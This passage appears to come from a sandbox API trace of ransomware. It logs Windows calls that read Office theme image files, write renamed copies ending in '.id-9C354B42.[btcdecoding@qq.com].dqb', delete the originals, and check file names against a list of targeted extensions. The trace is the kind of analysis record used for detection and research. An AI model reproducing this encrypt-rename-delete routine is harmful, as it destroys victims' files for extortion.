lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.264] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.264] SetEndOfFile (hFile=0x1dc) returned 1 [0043.264] CloseHandle (hObject=0x1dc) returned 1 [0043.264] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.264] SetEndOfFile (hFile=0x1a8) returned 1 [0043.265] CloseHandle (hObject=0x1a8) returned 1 [0043.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.265] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1 [0043.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.265] lstrlenW (lpString=".doc") returned 4 [0043.265] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.265] lstrlenW (lpString=".docx") returned 5 [0043.265] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.265] lstrlenW (lpString=".pdf") returned 4 [0043.265] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.265] lstrlenW (lpString=".xls") returned 4 [0043.265] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.265] lstrlenW (lpString=".xlsx") returned 5 [0043.265] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.266] lstrlenW (lpString=".ppt") returned 4 [0043.266] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString=".zip") returned 4 [0043.266] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.266] lstrlenW (lpString=".rar") returned 4 [0043.266] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.266] lstrlenW (lpString=".bz2") returned 4 [0043.266] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.266] lstrlenW (lpString=".7z") returned 3 [0043.266] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString=".dbf") returned 4 [0043.266] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString=".1cd") returned 4 [0043.266] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString=".jpg") returned 4 [0043.266] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.266] lstrlenW (lpString=".doc") returned 4 [0043.266] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.266] lstrlenW (lpString=".docx") returned 5 [0043.266] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.266] lstrlenW (lpString=".pdf") returned 4 [0043.266] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.267] lstrlenW (lpString=".xls") returned 4 [0043.267] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.267] lstrlenW (lpString=".xlsx") returned 5 [0043.267] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.267] lstrlenW (lpString=".ppt") returned 4 [0043.267] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.267] lstrlenW (lpString=".zip") returned 4 [0043.267] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.267] lstrlenW (lpString=".rar") returned 4 [0043.267] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.267] lstrlenW (lpString=".bz2") returned 4 [0043.267] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.267] lstrlenW (lpString=".7z") returned 3 [0043.267] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.267] lstrlenW (lpString=".dbf") returned 4 [0043.267] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.267] lstrlenW (lpString=".1cd") returned 4 [0043.267] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0043.267] lstrlenW (lpString=".jpg") returned 4 [0043.267] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.267] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.267] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.268] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=32607) returned 1 [0043.268] CloseHandle (hObject=0x1a8) returned 1 [0043.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20 [0043.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.268] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.268] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.268] GetLastError () returned 0x0 [0043.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x7f5f, lpOverlapped=0x0) returned 1 [0043.522] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x7f60, lpOverlapped=0x0) returned 1 [0043.524] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.524] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.524] SetEndOfFile (hFile=0x1dc) returned 1 [0043.524] CloseHandle (hObject=0x1dc) returned 1 [0043.524] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.524] SetEndOfFile (hFile=0x1a8) returned 1 [0043.525] CloseHandle (hObject=0x1a8) returned 1 [0043.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.525] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString=".doc") returned 4 [0043.526] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString=".docx") returned 5 [0043.526] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.526] lstrlenW (lpString=".pdf") returned 4 [0043.526] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString=".xls") returned 4 [0043.526] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.526] lstrlenW (lpString=".xlsx") returned 5 [0043.526] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.526] lstrlenW (lpString=".ppt") returned 4 [0043.526] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString=".zip") returned 4 [0043.526] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.526] lstrlenW (lpString=".rar") returned 4 [0043.526] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.526] lstrlenW (lpString=".bz2") returned 4 [0043.526] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString=".7z") returned 3 [0043.526] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString=".dbf") returned 4 [0043.526] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString=".1cd") returned 4 [0043.526] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString=".jpg") returned 4 [0043.526] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.526] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.527] lstrlenW (lpString=".doc") returned 4 [0043.527] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.527] lstrlenW (lpString=".docx") returned 5 [0043.527] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.527] lstrlenW (lpString=".pdf") returned 4 [0043.527] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.527] lstrlenW (lpString=".xls") returned 4 [0043.527] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.527] lstrlenW (lpString=".xlsx") returned 5 [0043.527] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.527] lstrlenW (lpString=".ppt") returned 4 [0043.527] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.527] lstrlenW (lpString=".zip") returned 4 [0043.527] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.527] lstrlenW (lpString=".rar") returned 4 [0043.527] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.527] lstrlenW (lpString=".bz2") returned 4 [0043.527] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.527] lstrlenW (lpString=".7z") returned 3 [0043.527] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.527] lstrlenW (lpString=".dbf") returned 4 [0043.527] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.527] lstrlenW (lpString=".1cd") returned 4 [0043.527] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.527] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0043.527] lstrlenW (lpString=".jpg") returned 4 [0043.527] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.527] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.527] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.922] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=28595) returned 1 [0043.922] CloseHandle (hObject=0x200) returned 1 [0043.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20 [0043.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.937] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.937] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.937] GetLastError () returned 0x0 [0043.937] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6fb3, lpOverlapped=0x0) returned 1 [0043.939] WriteFile (in: hFile=0x204, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6fc0, lpOverlapped=0x0) returned 1 [0043.940] ReadFile (in: hFile=0x200, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.940] WriteFile (in: hFile=0x204, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.941] SetEndOfFile (hFile=0x204) returned 1 [0043.941] CloseHandle (hObject=0x204) returned 1 [0043.941] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.941] SetEndOfFile (hFile=0x200) returned 1 [0043.942] CloseHandle (hObject=0x200) returned 1 [0043.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.942] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.942] lstrlenW (lpString=".doc") returned 4 [0043.942] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.942] lstrlenW (lpString=".docx") returned 5 [0043.942] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.942] lstrlenW (lpString=".pdf") returned 4 [0043.942] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.942] lstrlenW (lpString=".xls") returned 4 [0043.942] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.942] lstrlenW (lpString=".xlsx") returned 5 [0043.942] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.942] lstrlenW (lpString=".ppt") returned 4 [0043.942] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".zip") returned 4 [0043.943] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString=".rar") returned 4 [0043.943] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString=".bz2") returned 4 [0043.943] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString=".7z") returned 3 [0043.943] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".dbf") returned 4 [0043.943] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".1cd") returned 4 [0043.943] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".jpg") returned 4 [0043.943] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".doc") returned 4 [0043.943] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString=".docx") returned 5 [0043.943] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.943] lstrlenW (lpString=".pdf") returned 4 [0043.943] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.943] lstrlenW (lpString=".xls") returned 4 [0043.943] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString=".xlsx") returned 5 [0043.943] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.943] lstrlenW (lpString=".ppt") returned 4 [0043.943] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.943] lstrlenW (lpString=".zip") returned 4 [0043.943] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.943] lstrlenW (lpString=".rar") returned 4 [0043.944] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.944] lstrlenW (lpString=".bz2") returned 4 [0043.944] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.944] lstrlenW (lpString=".7z") returned 3 [0043.944] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.944] lstrlenW (lpString=".dbf") returned 4 [0043.944] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.944] lstrlenW (lpString=".1cd") returned 4 [0043.944] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0043.944] lstrlenW (lpString=".jpg") returned 4 [0043.944] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.944] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.944] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.352] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=18817) returned 1 [0044.354] CloseHandle (hObject=0x174) returned 1 [0044.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20 [0044.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.364] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.364] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.364] GetLastError () returned 0x0 [0044.364] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x4981, lpOverlapped=0x0) returned 1 [0044.368] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x4990, lpOverlapped=0x0) returned 1 [0044.369] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, 